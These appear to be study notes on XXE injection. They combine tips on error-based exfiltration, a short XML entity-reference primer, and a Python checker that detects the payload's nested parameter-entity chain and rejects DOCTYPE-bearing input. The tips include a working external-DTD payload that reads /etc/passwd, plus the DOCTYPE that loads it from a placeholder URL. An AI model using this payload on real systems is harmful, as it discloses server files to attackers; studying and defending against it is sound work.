Tips:

When using an external DTD, if the data we are exfiltrating is going to be placed inside a string, we'd have to use %xxe; (a parameter entity reference).

Character entity reference: the &#x25; below is % written as a numeric character reference.


<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

Note: the XML above is the external DTD served at 'YOUR-DTD-URL' in <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>. The exfil declaration is written inside the double-quoted value of the eval entity, so it is already inside a double-quote string.

Inside the string, we must use % to reference the variable (%file;), kind of like ${var} in Bash.


XML Introduction


XML Entity References

Some characters have a special meaning in XML.

If you place a character like "<" inside an XML element, it will generate an error because the parser interprets it as the start of a new element.

This will generate an XML error:

<message>salary < 1000</message>
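As an added defensive example (not part of these notes): a Python check that audits a fetched DTD fragment for the parameter-entity chain from the tips above, including the declaration hidden behind &#x25;, refuses any document carrying a DOCTYPE before parsing it, and escapes the '<' from the salary example so it becomes valid element content. EXTERNAL_DTD and DOC_WITH_DTD are constructed from the snippets in the notes; the function names are my own.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
PE_DECL_RE = re.compile(r"<!ENTITY\s+%\s*([A-Za-z_][\w.-]*)")  # <!ENTITY % name ...>
PE_EXTERNAL_RE = re.compile(r"<!ENTITY\s+%\s*([A-Za-z_][\w.-]*)\s+(?:SYSTEM|PUBLIC)\b")
PE_REF_RE = re.compile(r"%([A-Za-z_][\w.-]*);")  # %name;
CHARREF_RE = re.compile(r"&#(x[0-9A-Fa-f]+|[0-9]+);")  # &#x25; or &#37;

def decode_charrefs(text):
    """Expand numeric character references as a DTD processor would (&#x25; -> '%')."""
    def repl(m):
        v = m.group(1)
        return chr(int(v[1:], 16)) if v[0] in "xX" else chr(int(v))
    return CHARREF_RE.sub(repl, text)

def audit_dtd(dtd_text):
    """Report what a DTD fragment declares/references once expanded. 'nested_via_charref'
    lists declarations that only exist after expansion: the declaration-inside-a-string trick."""
    raw_decls = set(PE_DECL_RE.findall(dtd_text))
    expanded = decode_charrefs(dtd_text)
    decls = PE_DECL_RE.findall(expanded)
    return {
        "declared": decls,
        "external": PE_EXTERNAL_RE.findall(expanded),
        "referenced": PE_REF_RE.findall(expanded),
        "nested_via_charref": [n for n in decls if n not in raw_decls],
    }

def has_doctype(xml_text):
    return DOCTYPE_RE.search(xml_text) is not None

def safe_parse(xml_text):
    """Parse untrusted XML, refusing any DOCTYPE: no DTD, nowhere to declare entities."""
    if has_doctype(xml_text):
        raise ValueError("DOCTYPE declarations are not accepted")
    return ET.fromstring(xml_text)

def element_text(raw_value):
    """Escape '<', '>' and '&' so that e.g. 'salary < 1000' is valid element content."""
    return escape(raw_value)

# Constructed samples, built from the snippets in the notes above.
EXTERNAL_DTD = (
    '<!ENTITY % file SYSTEM "file:///etc/passwd">\n'
    '<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'file:///invalid/%file;\'>">\n'
    "%eval;\n%exfil;\n"
)
DOC_WITH_DTD = '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]><foo/>'
```

audit_dtd only sees the exfil declaration after the &#x25; is expanded, which is exactly why it shows up under nested_via_charref.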